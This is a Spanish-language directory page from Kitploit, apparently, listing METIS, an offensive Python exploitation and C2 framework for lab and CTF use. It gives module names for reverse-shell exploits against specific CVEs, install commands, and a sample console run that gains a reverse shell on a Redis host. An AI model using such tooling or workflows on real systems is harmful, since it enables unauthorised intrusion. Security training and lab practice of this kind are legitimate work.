Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
METIS — Marco de explotación modular en Python con una consola estilo Metasploit, módulos Exploit y Auxiliary con autorregistro, comprobaciones de tres estados y múltiples transportes de sesión para objetivos de laboratorio y CTF. | Kitploit
Herramientas/GitHubGitHub/k3ystr0k3r/metis
Frameworks de Pruebas de PenetraciónEscáneres de VulnerabilidadesFrameworks de ExploitsExplotaciónPost-ExplotaciónCTFPruebas de PenetraciónComando y ControlAprendizaje y EducaciónRed TeamingHerramienta de Acceso RemotoDesarrollo de Payloads
36hace 17h 32mAún no revisado
GitHubk3ystr0k3r/metis

METIS

Marco de explotación modular en Python con una consola estilo Metasploit, módulos Exploit y Auxiliary con autorregistro, comprobaciones de tres estados y múltiples transportes de sesión para objetivos de laboratorio y CTF.

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

METIS - Marco Modular de Explotación e Inteligencia de Amenazas

███╗   ███╗███████╗████████╗██╗███████╗
████╗ ████║██╔════╝╚══██╔══╝██║██╔════╝
██╔████╔██║█████╗     ██║   ██║███████╗
██║╚██╔╝██║██╔══╝     ██║   ██║╚════██║
██║ ╚═╝ ██║███████╗   ██║   ██║███████║
╚═╝     ╚═╝╚══════╝   ╚═╝   ╚═╝╚══════╝

Un marco de explotación en Python creado para el aprendizaje. Arquitectura modular, consola con temas, múltiples transportes de sesión y una biblioteca creciente de módulos CVE.


Impulsado por la Comunidad

METIS es un marco de investigación de seguridad impulsado por la comunidad. El objetivo es construir una colección creciente de módulos aportados por investigadores de seguridad, desarrolladores y la comunidad en general.

¿Tienes un escáner útil, un módulo auxiliar, un módulo de explotación u otra herramienta de investigación de seguridad que te gustaría compartir? Añádelo a METIS y abre un Pull Request.

Todas las contribuciones son bienvenidas, siempre que sigan la estructura de módulos del proyecto, los estándares de código y las directrices de uso autorizado.

Ya sea que estés añadiendo un nuevo módulo CVE, mejorando un módulo existente, corrigiendo un error o construyendo nueva funcionalidad del marco, tus contribuciones pueden ayudar a hacer METIS mejor para todos.

Consulta Escribir módulos a continuación para obtener información sobre cómo crear tu propio módulo.


Qué es

METIS es un marco modular de C2/explotación escrito en Python. Ejecuta una consola interactiva al estilo Metasploit donde seleccionas módulos, configuras opciones, ejecutas comprobaciones y estableces sesiones contra objetivos de laboratorio.

Está diseñado para:

  • Aprender cómo funcionan los marcos de explotación internamente
  • Trabajo de laboratorio contra VMs y contenedores vulnerables
  • Práctica de CTF donde un marco scriptable es más rápido que las herramientas manuales
  • Contribuciones de la comunidad a través de módulos personalizados y mejoras del marco

No está diseñado para:

  • Atacar sistemas que no posees o para los que no tienes permiso escrito de prueba
  • Compromisos de red team en producción (usa Cobalt Strike, Sliver o Mythic)
  • Cualquier cosa en la internet pública

Características

  • Arquitectura modular — coloca un archivo .py en modules/ y se registra automáticamente
  • Dos tipos de módulos — Exploit (genera sesiones) y Auxiliary (escáneres, enumeradores)
  • check() de tres estados — cada módulo puede verificar antes de atacar (VULNERABLE / SAFE / UNKNOWN)
  • Múltiples transportes de sesión — sockets inversos, sockets de escucha, canales paramiko, webshells HTTP, telnet crudo
  • Escaneo con hilos — especificaciones de objetivos CIDR/lista separada por comas/rango/file: con barras de progreso en vivo
  • Consola con temas — 22 esquemas de color integrados con degradados de barra de progreso por tema
  • Automatización con archivos RC — scripta flujos de trabajo completos
  • Archivos SOURCE por módulo — carga opciones desde archivos KEY=VALUE
  • Escape a shell local — ejecuta cualquier comando de shell sin salir del marco
  • Núcleo ligero — dependencias y abstracciones deliberadamente mínimas

Módulos

Auxiliary — escáneres y enumeradores

MóduloDescripción
auxiliary/scanner/tcp_connectEscáner de puertos TCP con hilos
auxiliary/scanner/hikvision_cve_2017_7921Bypass de autenticación + enumeración de usuarios en cámaras IP Hikvision
auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847Fuga de credenciales de MikroTik WinBox
auxiliary/scanner/redis_cve_2022_0543Detector de escape del sandbox Lua de Redis

Exploits — generadores de sesión

MóduloTipo de sesión
exploit/unix/ftp/vsftpd_234_backdoorSocket de escucha
exploit/multi/http/ghost_cms_handlebars_rceSocket inverso
exploit/multi/http/langflow_rce_cve_2026_9198Socket inverso
exploit/multi/http/budibase_plugin_upload_rce_cve_2026_31816Socket inverso
exploit/multi/http/activemq_jolokia_rce_cve_2026_34197Socket inverso
exploit/multi/http/tomcat_put_rce_cve_2017_12615Socket inverso
exploit/multi/http/joomla_jce_rce_cve_2026_48907Webshell HTTP
exploit/linux/http/freepbx_sqli_rce_cve_2025_57819Inverso retardado (cron)
exploit/linux/redis/redis_cve_2022_0543_rceSocket inverso
exploit/linux/ssh/libssh_auth_bypass_cve_2018_10933Canal Paramiko
exploit/linux/telnet/inetutils_telnetd_bypass_cve_2026_24061Socket telnet crudo

Instalación

Requiere Python 3.10+ y git.

git clone https://github.com/K3ysTr0K3R/METIS.git
cd METIS

python3 -m venv .venv
source .venv/bin/activate

pip install -r requirements.txt

requirements.txt:

pwntools>=4.11.0
requests>=2.31.0
paramiko>=3.0.0
redis>=5.0.0
cryptography>=42.0.0
rich>=13.7.0
prompt_toolkit>=3.0.43

Ejecutar:

python3 metis.py

Uso

metis > show modules

  #    Module                                                        Date        Rank       Chk  Description
  --   ------------------------------------------------------------  ----------  ---------  ---  -----------
  1    auxiliary/scanner/hikvision_cve_2017_7921                     2017-09-23  normal     Yes  Hikvision IP Camera Authentication Bypass (CVE-2017-7921)
  2    auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847        2018-08-01  great      Yes  MikroTik WinBox Credential Leak (CVE-2018-14847)
  ...
  15   exploit/unix/ftp/vsftpd_234_backdoor                          2011-07-03  excellent  Yes  vsftpd 2.3.4 Backdoor Command Execution

metis > search redis

  #   Module                                       Date        Rank       Chk  Description
  --  ------                                       ----       ----       ---  -----------
  1   auxiliary/scanner/redis_cve_2022_0543        2022-02-18  excellent  Yes  Redis CVE-2022-0543 Scanner
  2   exploit/linux/redis/redis_cve_2022_0543_rce  2022-02-18  excellent  Yes  Redis CVE-2022-0543 Lua Sandbox Escape RCE

metis > use 2
[*] using exploit/linux/redis/redis_cve_2022_0543_rce
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set RHOST 192.168.56.101
[+] RHOST => 192.168.56.101
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set LHOST 192.168.56.1
[+] LHOST => 192.168.56.1
metis exploit(linux/redis/redis_cve_2022_0543_rce) > check
[*] check: probing 192.168.56.101:6379
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[*] check -> vulnerable
metis exploit(linux/redis/redis_cve_2022_0543_rce) > exploit
[*] running check() before exploit (AUTOCHECK=true)
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[+] target appears vulnerable — proceeding
[*] listening on 192.168.56.1:4444 for reverse shell
[+] shell from 192.168.56.101:51234
[+] new session: <Session a3f2b1c4 192.168.56.101:51234>

metis exploit(linux/redis/redis_cve_2022_0543_rce) > sessions
  a3f2b1c4  192.168.56.101:51234  (alive)
Descargar herramienta